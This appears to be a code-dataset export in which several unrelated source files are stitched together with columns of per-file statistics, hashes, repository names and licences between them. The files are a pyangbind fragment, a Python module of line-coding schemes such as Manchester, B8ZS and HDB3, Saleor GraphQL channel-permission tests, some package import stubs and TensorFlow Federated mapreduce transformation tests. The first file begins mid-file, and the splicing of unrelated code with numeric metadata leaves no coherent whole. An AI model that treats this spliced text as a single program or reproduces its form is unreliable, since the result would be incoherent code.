_pyangbind_elements = {'tunnel_vif_index': tunnel_vif_index, 'lsp_id': lsp_id, 'forwarding_up': forwarding_up, 'primary_active': primary_active, 'primary_up': primary_up, 'secondary_active': secondary_active, 'secondary_up': secondary_up, 'selected_secondary_active': selected_secondary_active, 'selected_secondary_up': selected_secondary_up, 'frr_active': frr_active, 'frr_up': frr_up, 'instance_id': instance_id, 'out_port_id': out_port_id, 'out_port_name': out_port_name, 'out_label': out_label, }
| 65.445926
| 502
| 0.750272
| 5,996
| 44,176
| 5.233489
| 0.030354
| 0.042702
| 0.055322
| 0.05443
| 0.910771
| 0.885819
| 0.851562
| 0.829286
| 0.821829
| 0.815328
| 0
| 0.008976
| 0.127422
| 44,176
| 674
| 503
| 65.543027
| 0.805095
| 0.193091
| 0
| 0.505435
| 0
| 0.040761
| 0.361216
| 0.208887
| 0
| 0
| 0
| 0
| 0
| 1
| 0.130435
| false
| 0
| 0.021739
| 0
| 0.263587
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
077c93a353aa9d6dfaeb233e41f4886060e32525
| 39
|
py
|
Python
|
plain_logger/__init__.py
|
prapanw/plain_logger
|
075563b9c90d1918e1158bfc0a542e0cac6570e4
|
[
"MIT"
] | null | null | null |
plain_logger/__init__.py
|
prapanw/plain_logger
|
075563b9c90d1918e1158bfc0a542e0cac6570e4
|
[
"MIT"
] | null | null | null |
plain_logger/__init__.py
|
prapanw/plain_logger
|
075563b9c90d1918e1158bfc0a542e0cac6570e4
|
[
"MIT"
] | null | null | null |
from plain_logger.Logger import Logger
| 19.5
| 38
| 0.871795
| 6
| 39
| 5.5
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102564
| 39
| 1
| 39
| 39
| 0.942857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
6afc6de32f391e061be91dfe95af321598aecc9f
| 7,714
|
py
|
Python
|
line_coding_schemes.py
|
Shrey-Viradiya/LineCoding
|
2bd6d6019ee2af12fa8ffb777fdfec0c286ee327
|
[
"BSD-3-Clause"
] | 4
|
2019-10-24T15:55:28.000Z
|
2020-10-16T09:23:50.000Z
|
line_coding_schemes.py
|
Shrey-Viradiya/LineCoding
|
2bd6d6019ee2af12fa8ffb777fdfec0c286ee327
|
[
"BSD-3-Clause"
] | null | null | null |
line_coding_schemes.py
|
Shrey-Viradiya/LineCoding
|
2bd6d6019ee2af12fa8ffb777fdfec0c286ee327
|
[
"BSD-3-Clause"
] | null | null | null |
from utilities import text2binary
def polarRZ(message):
output = []
for x in text2binary(message):
if (x == '0'):
output.append(-1)
output.append(0)
else:
output.append(1)
output.append(0)
return output
def AMI(message):
output = []
change = 1
for x in text2binary(message):
if (x == '0'):
output.append(0)
else:
output.append(change)
if(change == 1):
change = -1
else:
change = 1
return output
def pseudoternary(message):
output = []
change = 1
for x in text2binary(message):
if (x == '1'):
output.append(0)
else:
output.append(change)
if(change == 1):
change = -1
else:
change = 1
return output
def NRZ_L(message):
output1 =[]
for b in text2binary(message):
if b=='0':
output1.append(1)
else:
output1.append(-1)
return output1
def NRZ_I(message):
output2 = []
flag = 1
for b in text2binary(message):
if(b == '1'):
if(flag == 1):
flag = -1
else:
flag = 1
output2.append(flag)
else:
output2.append(flag)
return output2
def twoBoneQ(message):
output3 = []
b = text2binary(message) # pls check the output of 2b1q !!!
for i in range(0,len(b)-1,2):
if(i==0):
if(b[0]=='0' and b[1]=='0'):
output3.append(1)
output3.append(1)
elif(b[0]=='0' and b[1]=='1'):
output3.append(2)
output3.append(2)
elif(b[0]=='1' and b[1]=='0'):
output3.append(-1)
output3.append(-1)
elif(b[0]=='1' and b[1]=='1'):
output3.append(-2)
output3.append(2)
elif(b[i]=='0' and b[i+1]=='0'):
if(output3[i-1]>0):
output3.append(1)
output3.append(1)
else:
output3.append(-1)
output3.append(-1)
elif(b[i]=='0' and b[i+1]=='1'):
if(output3[i-1]>0):
output3.append(2)
output3.append(2)
else:
output3.append(-2)
output3.append(-2)
elif(b[i]=='1' and b[i+1]=='0'):
if(output3[i-1]>0):
output3.append(-1)
output3.append(-1)
else:
output3.append(1)
output3.append(1)
elif(b[i]=='1' and b[i+1]=='1'):
if(output3[i-1]>0):
output3.append(-2)
output3.append(-2)
else:
output3.append(2)
output3.append(2)
return output3
def Manchester(message):
output = []
for x in text2binary(message):
if (x == '0'):
output.append(1)
output.append(-1)
else:
output.append(-1)
output.append(1)
return output
def diff_Manchester(message):
output = []
c=-1
b = text2binary(message)
for i in range(len(b)):
if i==0:
if b[0]=='0':
output.append(1)
output.append(-1)
c+=2
elif b[0]=='1':
output.append(-1)
output.append(1)
c+=2
elif b[i] == '0':
if output[c]==-1:
output.append(-1)
output.append(1)
c+=2
elif output[c]==1:
output.append(1)
output.append(-1)
c+=2
elif b[i] == '1':
if output[c]==1:
output.append(-1)
output.append(1)
c+=2
elif output[c]==-1:
output.append(1)
output.append(-1)
c+=2
return output
def MLT_3(message):
output = []
b = text2binary(message)
flag =-1
for i in range(len(b)):
if i==0:
if b[0]=='0':
output.append(0)
else:
output.append(1)
elif b[i]=='0':
output.append(output[i-1])
else:
if output[i-1]==1 or output[i-1]==-1:
output.append(0)
else:
if flag==1:
output.append(-1)
flag=-1
else:
output.append(1)
flag=1
return output
def B8ZS(message):
output = []
b = text2binary(message)
change = 1
i=0
while(i<len(b)):
if(i<=(len(b)-8) and b[i]=='0' and b[i+1]=='0' and b[i+2]=='0' and b[i+3]=='0' and b[i+4]=='0' and b[i+5]=='0' and b[i+6]=='0' and b[i+7]=='0' and i!=0 ):
if change==-1:
output.append(0)
output.append(0)
output.append(0)
output.append(1)
output.append(-1)
output.append(0)
output.append(-1)
output.append(1)
i+=8
else:
output.append(0)
output.append(0)
output.append(0)
output.append(-1)
output.append(1)
output.append(0)
output.append(1)
output.append(-1)
i+=8
elif (b[i] == '0'):
output.append(0)
i+=1
else:
output.append(change)
i+=1
if(change == 1):
change = -1
else:
change = 1
return output
def HDB_3(message):
output = []
b = text2binary(message)
#b = "110000"
change = 1
i=0 #"110000 0000 1100001001"
c=0 # counter
while(i<len(b)):
if(i<=(len(b)-4) and b[i]=='0' and b[i+1]=='0' and b[i+2]=='0' and b[i+3]=='0'and i!=0):
if(change == -1):
if(c%2==1):
output.append(0)
output.append(0)
output.append(0)
output.append(1)
change = -1
else:
output.append(-1)
output.append(0)
output.append(0)
output.append(-1)
change = 1
else:
if(c%2==1):
output.append(0)
output.append(0)
output.append(0)
output.append(-1)
change = 1
else:
output.append(1)
output.append(0)
output.append(0)
output.append(1)
change = -1
c=0
i+=4
elif (b[i] == '0'):
output.append(0)
i+=1
else:
output.append(change)
i+=1
if(change == 1):
change = -1
c+=1
else:
change = 1
c+=1
return output
| 27.648746
| 163
| 0.369069
| 833
| 7,714
| 3.411765
| 0.068427
| 0.278677
| 0.160099
| 0.120338
| 0.786066
| 0.753343
| 0.72273
| 0.662562
| 0.649191
| 0.646728
| 0
| 0.082142
| 0.501296
| 7,714
| 278
| 164
| 27.748201
| 0.656616
| 0.009982
| 0
| 0.809339
| 0
| 0
| 0.005503
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.042802
| false
| 0
| 0.003891
| 0
| 0.089494
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
ed5de515e53804d4e7759a9e14e53886e8b81641
| 3,724
|
py
|
Python
|
saleor/graphql/channel/tests/test_channel_queries.py
|
enesustundag/saleor
|
95ce4b577ca06110f4702e61f554e9d165ef5fd4
|
[
"CC-BY-4.0"
] | 1
|
2020-03-14T02:07:53.000Z
|
2020-03-14T02:07:53.000Z
|
saleor/graphql/channel/tests/test_channel_queries.py
|
enesustundag/saleor
|
95ce4b577ca06110f4702e61f554e9d165ef5fd4
|
[
"CC-BY-4.0"
] | null | null | null |
saleor/graphql/channel/tests/test_channel_queries.py
|
enesustundag/saleor
|
95ce4b577ca06110f4702e61f554e9d165ef5fd4
|
[
"CC-BY-4.0"
] | 1
|
2021-06-07T10:16:35.000Z
|
2021-06-07T10:16:35.000Z
|
import graphene
from ...tests.utils import assert_no_permission, get_graphql_content
QUERY_CHANNELS = """
query {
channels {
name
slug
currencyCode
}
}
"""
def test_query_channels_as_staff_user(staff_api_client, channel_USD, channel_PLN):
# given
# when
response = staff_api_client.post_graphql(QUERY_CHANNELS, {})
content = get_graphql_content(response)
# then
channels = content["data"]["channels"]
assert len(channels) == 2
assert {
"slug": channel_PLN.slug,
"name": channel_PLN.name,
"currencyCode": channel_PLN.currency_code,
} in channels
assert {
"slug": channel_USD.slug,
"name": channel_USD.name,
"currencyCode": channel_USD.currency_code,
} in channels
def test_query_channels_as_app(app_api_client, channel_USD, channel_PLN):
# given
# when
response = app_api_client.post_graphql(QUERY_CHANNELS, {})
content = get_graphql_content(response)
# then
channels = content["data"]["channels"]
assert len(channels) == 2
assert {
"slug": channel_PLN.slug,
"name": channel_PLN.name,
"currencyCode": channel_PLN.currency_code,
} in channels
assert {
"slug": channel_USD.slug,
"name": channel_USD.name,
"currencyCode": channel_USD.currency_code,
} in channels
def test_query_channels_as_customer(user_api_client, channel_USD, channel_PLN):
# given
# when
response = user_api_client.post_graphql(QUERY_CHANNELS, {})
# then
assert_no_permission(response)
def test_query_channels_as_anonymous(api_client, channel_USD, channel_PLN):
# given
# when
response = api_client.post_graphql(QUERY_CHANNELS, {})
# then
assert_no_permission(response)
QUERY_CHANNEL = """
query getChannel($id: ID!){
channel(id: $id){
id
name
slug
currencyCode
}
}
"""
def test_query_channel_as_staff_user(staff_api_client, channel_USD):
# given
channel_id = graphene.Node.to_global_id("Channel", channel_USD.id)
variables = {"id": channel_id}
# when
response = staff_api_client.post_graphql(QUERY_CHANNEL, variables)
content = get_graphql_content(response)
# then
channel_data = content["data"]["channel"]
assert channel_data["id"] == channel_id
assert channel_data["name"] == channel_USD.name
assert channel_data["slug"] == channel_USD.slug
assert channel_data["currencyCode"] == channel_USD.currency_code
def test_query_channel_as_app(app_api_client, channel_USD):
# given
channel_id = graphene.Node.to_global_id("Channel", channel_USD.id)
variables = {"id": channel_id}
# when
response = app_api_client.post_graphql(QUERY_CHANNEL, variables)
content = get_graphql_content(response)
# then
channel_data = content["data"]["channel"]
assert channel_data["id"] == channel_id
assert channel_data["name"] == channel_USD.name
assert channel_data["slug"] == channel_USD.slug
assert channel_data["currencyCode"] == channel_USD.currency_code
def test_query_channel_as_customer(user_api_client, channel_USD):
# given
channel_id = graphene.Node.to_global_id("Channel", channel_USD.id)
variables = {"id": channel_id}
# when
response = user_api_client.post_graphql(QUERY_CHANNEL, variables)
# then
assert_no_permission(response)
def test_query_channel_as_anonymous(api_client, channel_USD):
# given
channel_id = graphene.Node.to_global_id("Channel", channel_USD.id)
variables = {"id": channel_id}
# when
response = api_client.post_graphql(QUERY_CHANNEL, variables)
# then
assert_no_permission(response)
| 25.162162
| 82
| 0.693609
| 460
| 3,724
| 5.25
| 0.1
| 0.099379
| 0.039752
| 0.06294
| 0.942443
| 0.930021
| 0.89441
| 0.879503
| 0.846377
| 0.770186
| 0
| 0.000673
| 0.201665
| 3,724
| 147
| 83
| 25.333333
| 0.811638
| 0.034103
| 0
| 0.666667
| 0
| 0
| 0.106943
| 0
| 0
| 0
| 0
| 0
| 0.218391
| 1
| 0.091954
| false
| 0
| 0.022989
| 0
| 0.114943
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
ed74c60875f97bd8aff15905a7dc3474ce37a54c
| 24
|
py
|
Python
|
models/__init__.py
|
jakobottar/gimondi
|
b6e53036bc09b614ba4c7864f588cd1e1f6c76e0
|
[
"MIT"
] | 3
|
2022-01-18T19:25:46.000Z
|
2022-02-05T18:53:24.000Z
|
utils/models/other/voxnet2d/__init__.py
|
bhklab/ptl-oar-segmentation
|
354c3ee7f042a025f74e210a7b8462beac9b727d
|
[
"Apache-2.0"
] | null | null | null |
utils/models/other/voxnet2d/__init__.py
|
bhklab/ptl-oar-segmentation
|
354c3ee7f042a025f74e210a7b8462beac9b727d
|
[
"Apache-2.0"
] | null | null | null |
from .model import UNet
| 12
| 23
| 0.791667
| 4
| 24
| 4.75
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 24
| 1
| 24
| 24
| 0.95
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
71f4251ff357947ffb9ca198dbcab44d187f7203
| 182
|
py
|
Python
|
classifcation/__init__.py
|
JessikaSmith/reviews_classification_and_aspect_extraction
|
457c17363d214e4f674068939b278c760b61b59b
|
[
"MIT"
] | 1
|
2018-11-15T18:03:39.000Z
|
2018-11-15T18:03:39.000Z
|
classifcation/__init__.py
|
JessikaSmith/reviews_classification_and_aspect_extraction
|
457c17363d214e4f674068939b278c760b61b59b
|
[
"MIT"
] | null | null | null |
classifcation/__init__.py
|
JessikaSmith/reviews_classification_and_aspect_extraction
|
457c17363d214e4f674068939b278c760b61b59b
|
[
"MIT"
] | null | null | null |
import classifcation.word2vec_preparation
import classifcation.preprocess_data
import classifcation.model
import classifcation.classification_quality_check
import classifcation.utils
| 36.4
| 49
| 0.923077
| 19
| 182
| 8.631579
| 0.578947
| 0.579268
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.00578
| 0.049451
| 182
| 5
| 50
| 36.4
| 0.942197
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
9c0169a19a0dc0ce7f1b39bef780f911980939b4
| 201
|
py
|
Python
|
MathFunctions/__init__.py
|
chezzoba/Functions
|
efc20e81dbe78ca1f6931e443715abc948ed7ed8
|
[
"MIT"
] | null | null | null |
MathFunctions/__init__.py
|
chezzoba/Functions
|
efc20e81dbe78ca1f6931e443715abc948ed7ed8
|
[
"MIT"
] | null | null | null |
MathFunctions/__init__.py
|
chezzoba/Functions
|
efc20e81dbe78ca1f6931e443715abc948ed7ed8
|
[
"MIT"
] | null | null | null |
from MathFunctions.Polynomial import Polynomial, Linear
from MathFunctions.Trigonometry import Sin, Cos, sin, cos, tan
from MathFunctions.Exponential import Exponential, Logarithm, ln, log2, log10, exp
| 67
| 82
| 0.830846
| 25
| 201
| 6.68
| 0.6
| 0.305389
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.016667
| 0.104478
| 201
| 3
| 82
| 67
| 0.911111
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
9c1144b25e44af1a2b8c1c28f4792ac6506ce97d
| 36,799
|
py
|
Python
|
tensorflow_federated/python/core/backends/mapreduce/transformations_test.py
|
Catherineylp/federated
|
7a5549f3fb0eb2e3b5cdcb4788a8856cbfa17416
|
[
"Apache-2.0"
] | null | null | null |
tensorflow_federated/python/core/backends/mapreduce/transformations_test.py
|
Catherineylp/federated
|
7a5549f3fb0eb2e3b5cdcb4788a8856cbfa17416
|
[
"Apache-2.0"
] | null | null | null |
tensorflow_federated/python/core/backends/mapreduce/transformations_test.py
|
Catherineylp/federated
|
7a5549f3fb0eb2e3b5cdcb4788a8856cbfa17416
|
[
"Apache-2.0"
] | null | null | null |
# Lint as: python2, python3
# Copyright 2019, The TensorFlow Federated Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import absltest
import tensorflow as tf
from tensorflow_federated.proto.v0 import computation_pb2
from tensorflow_federated.python.core.api import computation_types
from tensorflow_federated.python.core.api import intrinsics
from tensorflow_federated.python.core.api import placements
from tensorflow_federated.python.core.backends.mapreduce import canonical_form_utils
from tensorflow_federated.python.core.backends.mapreduce import test_utils
from tensorflow_federated.python.core.backends.mapreduce import transformations as mapreduce_transformations
from tensorflow_federated.python.core.impl import computation_constructing_utils
from tensorflow_federated.python.core.impl import computation_wrapper_instances
from tensorflow_federated.python.core.impl import intrinsic_defs
from tensorflow_federated.python.core.impl import transformation_utils
from tensorflow_federated.python.core.impl import transformations
from tensorflow_federated.python.core.impl.compiler import building_block_analysis
from tensorflow_federated.python.core.impl.compiler import building_blocks
from tensorflow_federated.python.core.impl.compiler import tree_analysis
class TransformationsTest(absltest.TestCase):
def test_example_training_comp_reduces(self):
training_comp = test_utils.construct_example_training_comp()
self.assertIsInstance(
test_utils.computation_to_building_block(training_comp.next),
building_blocks.Lambda)
class CheckExtractionResultTest(absltest.TestCase):
def test_raises_on_none_args(self):
with self.assertRaisesRegex(TypeError, 'None'):
mapreduce_transformations.check_extraction_result(
None, building_blocks.Reference('x', tf.int32))
with self.assertRaisesRegex(TypeError, 'None'):
mapreduce_transformations.check_extraction_result(
building_blocks.Reference('x', tf.int32), None)
def test_raises_function_and_call(self):
function = building_blocks.Reference(
'f', computation_types.FunctionType(tf.int32, tf.int32))
integer_ref = building_blocks.Reference('x', tf.int32)
call = building_blocks.Call(function, integer_ref)
with self.assertRaisesRegex(
mapreduce_transformations.CanonicalFormCompilationError,
'we have the functional type'):
mapreduce_transformations.check_extraction_result(function, call)
def test_raises_non_function_and_compiled_computation(self):
init = canonical_form_utils.get_iterative_process_for_canonical_form(
test_utils.get_temperature_sensor_example()).initialize
compiled_computation = (
test_utils.computation_to_building_block(init).argument.function)
integer_ref = building_blocks.Reference('x', tf.int32)
with self.assertRaisesRegex(
mapreduce_transformations.CanonicalFormCompilationError,
'we have the non-functional type'):
mapreduce_transformations.check_extraction_result(integer_ref,
compiled_computation)
def test_raises_function_and_compiled_computation_of_different_type(self):
init = canonical_form_utils.get_iterative_process_for_canonical_form(
test_utils.get_temperature_sensor_example()).initialize
compiled_computation = (
test_utils.computation_to_building_block(init).argument.function)
function = building_blocks.Reference(
'f', computation_types.FunctionType(tf.int32, tf.int32))
with self.assertRaisesRegex(
mapreduce_transformations.CanonicalFormCompilationError,
'incorrect TFF type'):
mapreduce_transformations.check_extraction_result(function,
compiled_computation)
def test_raises_tensor_and_call_to_not_compiled_computation(self):
function = building_blocks.Reference(
'f', computation_types.FunctionType(tf.int32, tf.int32))
ref_to_int = building_blocks.Reference('x', tf.int32)
called_fn = building_blocks.Call(function, ref_to_int)
with self.assertRaisesRegex(
mapreduce_transformations.CanonicalFormCompilationError, 'missing'):
mapreduce_transformations.check_extraction_result(ref_to_int, called_fn)
def test_passes_function_and_compiled_computation_of_same_type(self):
init = canonical_form_utils.get_iterative_process_for_canonical_form(
test_utils.get_temperature_sensor_example()).initialize
compiled_computation = (
test_utils.computation_to_building_block(init).argument.function)
function = building_blocks.Reference('f',
compiled_computation.type_signature)
mapreduce_transformations.check_extraction_result(function,
compiled_computation)
class ConsolidateAndExtractTest(absltest.TestCase):
def test_raises_on_none(self):
with self.assertRaises(TypeError):
mapreduce_transformations.consolidate_and_extract_local_processing(None)
def test_raises_reference_to_functional_type(self):
function_type = computation_types.FunctionType(tf.int32, tf.int32)
ref = building_blocks.Reference('x', function_type)
with self.assertRaisesRegex(ValueError, 'of functional type passed'):
mapreduce_transformations.consolidate_and_extract_local_processing(ref)
def test_already_reduced_case(self):
init = canonical_form_utils.get_iterative_process_for_canonical_form(
test_utils.get_temperature_sensor_example()).initialize
comp = test_utils.computation_to_building_block(init)
result = mapreduce_transformations.consolidate_and_extract_local_processing(
comp)
self.assertIsInstance(result, building_blocks.CompiledComputation)
self.assertIsInstance(result.proto, computation_pb2.Computation)
self.assertEqual(result.proto.WhichOneof('computation'), 'tensorflow')
def test_reduces_unplaced_lambda_leaving_type_signature_alone(self):
lam = building_blocks.Lambda('x', tf.int32,
building_blocks.Reference('x', tf.int32))
extracted_tf = mapreduce_transformations.consolidate_and_extract_local_processing(
lam)
self.assertIsInstance(extracted_tf, building_blocks.CompiledComputation)
self.assertEqual(extracted_tf.type_signature, lam.type_signature)
def test_reduces_unplaced_lambda_to_equivalent_tf(self):
lam = building_blocks.Lambda('x', tf.int32,
building_blocks.Reference('x', tf.int32))
extracted_tf = mapreduce_transformations.consolidate_and_extract_local_processing(
lam)
executable_tf = computation_wrapper_instances.building_block_to_computation(
extracted_tf)
executable_lam = computation_wrapper_instances.building_block_to_computation(
lam)
for k in range(10):
self.assertEqual(executable_tf(k), executable_lam(k))
def test_reduces_federated_identity_to_member_identity(self):
fed_int_type = computation_types.FederatedType(tf.int32, placements.CLIENTS)
lam = building_blocks.Lambda('x', fed_int_type,
building_blocks.Reference('x', fed_int_type))
extracted_tf = mapreduce_transformations.consolidate_and_extract_local_processing(
lam)
self.assertIsInstance(extracted_tf, building_blocks.CompiledComputation)
unplaced_function_type = computation_types.FunctionType(
fed_int_type.member, fed_int_type.member)
self.assertEqual(extracted_tf.type_signature, unplaced_function_type)
def test_reduces_federated_map_to_equivalent_function(self):
lam = building_blocks.Lambda('x', tf.int32,
building_blocks.Reference('x', tf.int32))
arg = building_blocks.Reference(
'arg', computation_types.FederatedType(tf.int32, placements.CLIENTS))
mapped_fn = computation_constructing_utils.create_federated_map_or_apply(
lam, arg)
extracted_tf = mapreduce_transformations.consolidate_and_extract_local_processing(
mapped_fn)
self.assertIsInstance(extracted_tf, building_blocks.CompiledComputation)
executable_tf = computation_wrapper_instances.building_block_to_computation(
extracted_tf)
executable_lam = computation_wrapper_instances.building_block_to_computation(
lam)
for k in range(10):
self.assertEqual(executable_tf(k), executable_lam(k))
def test_reduces_federated_apply_to_equivalent_function(self):
lam = building_blocks.Lambda('x', tf.int32,
building_blocks.Reference('x', tf.int32))
arg = building_blocks.Reference(
'arg', computation_types.FederatedType(tf.int32, placements.CLIENTS))
mapped_fn = computation_constructing_utils.create_federated_map_or_apply(
lam, arg)
extracted_tf = mapreduce_transformations.consolidate_and_extract_local_processing(
mapped_fn)
self.assertIsInstance(extracted_tf, building_blocks.CompiledComputation)
executable_tf = computation_wrapper_instances.building_block_to_computation(
extracted_tf)
executable_lam = computation_wrapper_instances.building_block_to_computation(
lam)
for k in range(10):
self.assertEqual(executable_tf(k), executable_lam(k))
def test_reduces_federated_value_at_server_to_equivalent_noarg_function(self):
federated_value = intrinsics.federated_value(0, placements.SERVER)._comp
extracted_tf = mapreduce_transformations.consolidate_and_extract_local_processing(
federated_value)
executable_tf = computation_wrapper_instances.building_block_to_computation(
extracted_tf)
self.assertEqual(executable_tf(), 0)
def test_reduces_federated_value_at_clients_to_equivalent_noarg_function(
self):
federated_value = intrinsics.federated_value(0, placements.CLIENTS)._comp
extracted_tf = mapreduce_transformations.consolidate_and_extract_local_processing(
federated_value)
executable_tf = computation_wrapper_instances.building_block_to_computation(
extracted_tf)
self.assertEqual(executable_tf(), 0)
def test_reduces_lambda_returning_empty_tuple_to_tf(self):
self.skipTest('Depends on a lower level fix, currently in review.')
empty_tuple = building_blocks.Tuple([])
lam = building_blocks.Lambda('x', tf.int32, empty_tuple)
extracted_tf = mapreduce_transformations.consolidate_and_extract_local_processing(
lam)
self.assertIsInstance(extracted_tf, building_blocks.CompiledComputation)
class ForceAlignAndSplitByIntrinsicTest(absltest.TestCase):
def test_returns_comps_with_federated_broadcast(self):
iterative_process = test_utils.construct_example_training_comp()
comp = test_utils.computation_to_building_block(iterative_process.next)
uri = intrinsic_defs.FEDERATED_BROADCAST.uri
before, after = mapreduce_transformations.force_align_and_split_by_intrinsic(
comp, uri)
def _predicate(comp):
return building_block_analysis.is_called_intrinsic(comp, uri)
self.assertIsInstance(comp, building_blocks.Lambda)
self.assertEqual(tree_analysis.count(comp, _predicate), 3)
self.assertIsInstance(before, building_blocks.Lambda)
self.assertEqual(tree_analysis.count(before, _predicate), 0)
self.assertEqual(before.parameter_type, comp.parameter_type)
self.assertIsInstance(after, building_blocks.Lambda)
self.assertEqual(tree_analysis.count(after, _predicate), 0)
self.assertEqual(after.result.type_signature, comp.result.type_signature)
def test_returns_comps_with_federated_aggregate(self):
iterative_process = test_utils.construct_example_training_comp()
comp = test_utils.computation_to_building_block(iterative_process.next)
uri = intrinsic_defs.FEDERATED_AGGREGATE.uri
before, after = mapreduce_transformations.force_align_and_split_by_intrinsic(
comp, uri)
def _predicate(comp):
return building_block_analysis.is_called_intrinsic(comp, uri)
self.assertIsInstance(comp, building_blocks.Lambda)
self.assertEqual(tree_analysis.count(comp, _predicate), 2)
self.assertIsInstance(before, building_blocks.Lambda)
self.assertEqual(tree_analysis.count(before, _predicate), 0)
self.assertEqual(before.parameter_type, comp.parameter_type)
self.assertIsInstance(after, building_blocks.Lambda)
self.assertEqual(tree_analysis.count(after, _predicate), 0)
self.assertEqual(after.result.type_signature, comp.result.type_signature)
class ExtractArgumentsTest(absltest.TestCase):
def test_raises_on_none(self):
with self.assertRaises(TypeError):
mapreduce_transformations.zip_selection_as_argument_to_lower_level_lambda(
None, [0])
def test_raises_on_non_lambda_comp(self):
ref = building_blocks.Reference('x', [tf.int32])
with self.assertRaises(TypeError):
mapreduce_transformations.zip_selection_as_argument_to_lower_level_lambda(
ref, [0])
def test_raises_on_none_selections(self):
lam = building_blocks.Lambda('x', tf.int32,
building_blocks.Reference('x', [tf.int32]))
with self.assertRaises(TypeError):
mapreduce_transformations.zip_selection_as_argument_to_lower_level_lambda(
lam, None)
def test_raises_on_selection_tuple(self):
lam = building_blocks.Lambda('x', tf.int32,
building_blocks.Reference('x', [tf.int32]))
with self.assertRaises(TypeError):
mapreduce_transformations.zip_selection_as_argument_to_lower_level_lambda(
lam, (0))
def test_raises_on_non_tuple_parameter(self):
lam = building_blocks.Lambda('x', tf.int32,
building_blocks.Reference('x', tf.int32))
with self.assertRaises(TypeError):
mapreduce_transformations.zip_selection_as_argument_to_lower_level_lambda(
lam, [[0]])
def test_raises_on_selection_from_non_tuple(self):
lam = building_blocks.Lambda('x', [tf.int32],
building_blocks.Reference('x', [tf.int32]))
with self.assertRaisesRegex(TypeError, 'nonexistent index'):
mapreduce_transformations.zip_selection_as_argument_to_lower_level_lambda(
lam, [[0, 0]])
def test_raises_on_non_int_index(self):
lam = building_blocks.Lambda(
'x', [tf.int32], building_blocks.Reference('x', [('a', tf.int32)]))
with self.assertRaises(TypeError):
mapreduce_transformations.zip_selection_as_argument_to_lower_level_lambda(
lam, [['a']])
def test_raises_on_non_federated_selection(self):
lam = building_blocks.Lambda('x', [tf.int32],
building_blocks.Reference('x', [tf.int32]))
with self.assertRaises(TypeError):
mapreduce_transformations.zip_selection_as_argument_to_lower_level_lambda(
lam, [[0]])
def test_raises_on_selections_at_different_placements(self):
fed_at_clients = computation_types.FederatedType(tf.int32,
placements.CLIENTS)
fed_at_server = computation_types.FederatedType(tf.int32, placements.SERVER)
tuple_of_federated_types = computation_types.NamedTupleType(
[fed_at_clients, fed_at_server])
lam = building_blocks.Lambda(
'x', tuple_of_federated_types,
building_blocks.Selection(
building_blocks.Reference('x', tuple_of_federated_types), index=0))
with self.assertRaisesRegex(ValueError, 'at the same placement.'):
mapreduce_transformations.zip_selection_as_argument_to_lower_level_lambda(
lam, [[0], [1]])
